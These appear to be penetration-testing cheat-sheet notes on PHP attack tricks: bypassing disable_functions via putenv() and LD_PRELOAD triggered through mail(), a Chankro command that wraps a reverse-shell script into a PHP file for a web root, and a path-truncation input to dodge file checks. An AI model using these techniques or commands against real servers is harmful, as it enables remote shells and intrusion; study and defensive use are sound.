# PHP in Linux calls a binary (sendmail) when the mail() function is executed. # If we have putenv() allowed, we can set the environment variable "LD_PRELOAD", so we can # preload an arbitrary shared object. Our shared object will execute our custom # payload (a binary or a bash script) without the PHP restrictions, so we can have a reverse shell, for example.# Chankro tool is used for that (https://github.com/TarlogicSecurity/Chankro)
python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html
MISC
# Path truncation# PHP max path is 4096 char# It is possible to bypass checks for one file, for example, by flooding the path before requesting a resourcepage=././././././././.......
# There is a BIG difference between “$salt” and ‘$salt’.# Double quotes → interpreted as a variable# Simple quotes → interpreted as a string